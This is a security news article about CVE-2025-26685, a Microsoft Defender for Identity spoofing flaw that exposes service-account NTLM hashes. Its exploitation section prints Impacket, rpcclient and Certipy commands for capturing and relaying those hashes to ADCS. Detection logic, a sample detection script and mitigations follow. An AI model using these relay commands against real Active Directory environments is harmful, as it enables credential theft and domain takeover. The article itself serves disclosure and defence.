Microsoft Defender Spoofing Flaw Enables Privilege Escalation and AD Access
A newly disclosed spoofing vulnerability (CVE-2025-26685) in Microsoft Defender for Identity (MDI) enables unauthenticated attackers to capture Net-NTLM hashes of critical Directory Service Accounts (DSAs), potentially compromising Active Directory environments.
Rated 6.5 (Medium) on the CVSS v3.1 scale, this flaw abuses MDI’s Lateral Movement Paths (LMPs) feature and was addressed in Microsoft’s May 2025 Patch Tuesday updates.
Technical Breakdown
According to the report, the vulnerability stems from MDI’s use of SAM-R protocol queries to map LMPs—security features designed to visualize privilege escalation paths in Active Directory.
Attackers can trigger these queries by initiating anonymous SMB connections to Domain Controllers, forcing the MDI sensor to authenticate via NTLM instead of Kerberos.
Key Exploitation Requirements:
- Attacker-controlled system with a DNS record (often auto-generated via Windows DHCP)
- Generation of Windows Event ID 4672 on Domain Controllers during SMB null session attempts
Exploitation Workflow
Attackers leverage tools like Impacket and Certipy to execute a multi-stage attack:
- Hash Capture

```bash
# Initiate SMB listener
impacket-smbserver share $(pwd) -smb2support
# Trigger MDI sensor via SMB null session
rpcclient -U "" -N 10.0.0.1
```
This forces the MDI sensor’s DSA to authenticate, exposing its Net-NTLMv1/v2 hash.
- Hash Relaying (via ESC8 Vulnerability)

```bash
# Relay hash to ADCS Web Enrollment endpoint
certipy relay -target http://adcs-ca.domain.local
# Request certificate for DSA
certipy auth -pfx dsa_cert.pfx -dc-ip 10.0.0.1
```
Successful relaying grants attackers DSA privileges, enabling lateral movement.
Impact Analysis
| Component | Risk |
|---|---|
| DSA Accounts | Privilege escalation via hash cracking/relaying |
| Certificate Authority | Malicious certificate issuance |
| Lateral Movement | Unrestricted access to mapped LMPs |
The DSA’s default permissions—including read access to Active Directory’s Deleted Objects Container—allow attackers to reconstruct AD topology and identify high-value targets.
Detection Strategies
Microsoft recommends monitoring for:
- Anomalous DSA Authentication
- Windows Event ID 4624 from non-Domain Controller IPs
- ADCS Template Enumeration (LDAP search filter matching both CA and template objects)

```text
(|(objectClass=certificationAuthority)(objectClass=pKICertificateTemplate))
```
- Certificate-Based TGT Requests
- Windows Event ID 4768 with pre-authentication type 16
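The two event-log signals above, turned into detection logic and run over constructed Security-log records (added example, not from the original article or from Microsoft; the DSA name, DC addresses and event records are all made up):

```python
"""Two detections from the article, run over constructed Security-log records:
  * Event 4624 where a Directory Service Account logs on from an IP that is
    not a Domain Controller (a relayed DSA credential shows up from a new host).
  * Event 4768 with PreAuthType 16 (PA-PK-AS-REQ), i.e. a TGT requested with
    a certificate rather than a password, as after an ESC8-style relay."""

# Constructed environment facts; replace with your own inventory.
DOMAIN_CONTROLLERS = {"10.0.0.1", "10.0.0.2"}
DSA_ACCOUNTS = {"svc-mdi-dsa"}             # hypothetical DSA name
LOCAL_SOURCES = {"-", "::1", "127.0.0.1"}  # how 4624 renders local logons

# Constructed sample events shaped like exported Security-log fields.
SAMPLE_EVENTS = [
    {"EventID": 4624, "TargetUserName": "svc-mdi-dsa", "IpAddress": "10.0.0.1", "LogonType": 3},
    {"EventID": 4624, "TargetUserName": "svc-mdi-dsa", "IpAddress": "-", "LogonType": 5},
    {"EventID": 4624, "TargetUserName": "svc-mdi-dsa", "IpAddress": "10.0.0.77", "LogonType": 3},
    {"EventID": 4624, "TargetUserName": "alice", "IpAddress": "10.0.0.77", "LogonType": 3},
    {"EventID": 4768, "TargetUserName": "svc-mdi-dsa", "IpAddress": "10.0.0.77", "PreAuthType": 16},
    {"EventID": 4768, "TargetUserName": "bob", "IpAddress": "10.0.0.50", "PreAuthType": 2},
]

def dsa_logon_from_non_dc(event, dsa_accounts, domain_controllers):
    """4624: a DSA logging on from a host that is not a Domain Controller."""
    if event.get("EventID") != 4624:
        return False
    user = event.get("TargetUserName", "").lower()
    ip = event.get("IpAddress", "-")
    if user not in {a.lower() for a in dsa_accounts} or ip in LOCAL_SOURCES:
        return False  # local/interactive logons carry no usable source IP
    return ip not in domain_controllers

def certificate_based_tgt(event):
    """4768: Kerberos AS-REQ pre-authenticated with a certificate (type 16)."""
    return event.get("EventID") == 4768 and str(event.get("PreAuthType")) == "16"

def find_suspicious(events, dsa_accounts=DSA_ACCOUNTS, domain_controllers=DOMAIN_CONTROLLERS):
    """Return (rule, user, source_ip, severity); certificate TGTs for a DSA rate high."""
    hits = []
    for ev in events:
        user, ip = ev.get("TargetUserName", ""), ev.get("IpAddress", "-")
        if dsa_logon_from_non_dc(ev, dsa_accounts, domain_controllers):
            hits.append(("dsa_logon_non_dc", user, ip, "high"))
        elif certificate_based_tgt(ev):
            severity = "high" if user.lower() in {a.lower() for a in dsa_accounts} else "medium"
            hits.append(("certificate_tgt", user, ip, severity))
    return hits

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print(hit)
```

Feed it records exported from the Security log (for example via Get-WinEvent converted to dictionaries) and tune DSA_ACCOUNTS and DOMAIN_CONTROLLERS to the environment; any certificate-based TGT for a DSA deserves immediate review, since a gMSA-backed DSA should never authenticate that way.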
| Solution | Classic MDI Sensor | Unified XDR Sensor |
|---|---|---|
| Authentication Protocol | SAM-R (NTLM/Kerberos) | WMI (Kerberos-only) |
| LMP Mapping Method | Local Admin Queries | Behavioral Analytics |
| Vulnerability Status | Affected | Not Vulnerable |
Microsoft mandates migration to XDR sensors (v3.x+) and suggests:
- Replacing standard DSA accounts with Group Managed Service Accounts (gMSAs)
- Disabling LMPs via support request if incompatible with the infrastructure
```powershell
# Convert DSA to gMSA
New-MDIDSA -Identity "DefenderIdentity" -ForceStandardAccount:$false
```
This vulnerability highlights the risks of over-permissioned service accounts in security products.
While patches mitigate immediate threats, organizations must audit third-party security tools’ AD integrations and enforce strict NTLM relay protections.
The intersection of MDI’s LMPs and ADCS vulnerabilities demonstrates how chained exploits can turn medium-severity flaws into domain-wide compromises.